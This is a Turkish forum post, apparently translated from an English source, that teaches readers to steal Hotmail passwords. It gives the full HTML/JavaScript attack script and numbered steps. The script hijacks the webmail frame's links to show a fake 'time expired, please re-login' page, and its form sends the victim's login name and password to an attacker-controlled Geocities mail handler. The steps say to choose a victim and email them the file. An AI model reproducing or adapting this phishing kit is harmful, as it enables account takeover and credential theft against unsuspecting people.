HOTMAİL HACKED
Selamlar. Bu bölümde hotmail mail hesaplarını hack eden bir html scriptini inceleyeceğiz. Scriptin tamamı sayfanın sonunda bulacaksınız. Bu exploitin işleyiişi çok basit. Adamın hotmail adresine bir mail yolluyorsunuz. İçinde bu scriptin olduğu bir htm dosyası bulunuyor. Adam htm dosyasını açar açmaz tüm user name ve passwordları sizin belirlediğiniz mail adresine yollanıyor.
Şimdi adım adım işlemleri yapalım....
Adım 1: Önce kurban seçin.Hotmailden bir mail hesabı açın.
Adım 2: Geocities ten bir mail adresi alın ben burda phyton olarak seçtim. olan bir mail adresi almış oldum. Web alanı sizi ilgilendirmiyor bu işlemde...
Adım 3: Aşağıdaki scriptteki 17 satırda bulunan satırda yapmanız gereken değişiklik var. Şu an phyton hesabına göre "<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?phyton\" target=\"_top\">" + bu şekilde gözüküyor. burada phyton yazan yere kendi geocities mail hesabınızı yazın. Adamın hotmail hesabı buraya yollanacak. Scriptte hemen altta...
-----------------------------------------------
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?phyton\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links
.target="work";
top.submenu.document.links.href="java script:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links.target="work";
top.work.document.links.href="java script:getmess()";
}
</script>
</body>
</html>
-----------------------------------------------
Adım 4: Şimdi bir mesaj hazırlayın. İçine bu scripti yzdığınız html dosyasını yerleştirip yollayın.
Adım 5: Kurban bu maili kontrol edip html açar açmaz user ve pass geocities hesabınıza gelecektir.
Iyi hackler..
Bu döküman by Because-we-can.com tarafından yazılmış PHYTON tarafından türkçeye çevrilip uyarlanmıştır.
KOLAY GELSİN
===AlInTi===
Kırık Link Bildir! #23411 07-05-2006 12:54 GMT-1 saat 
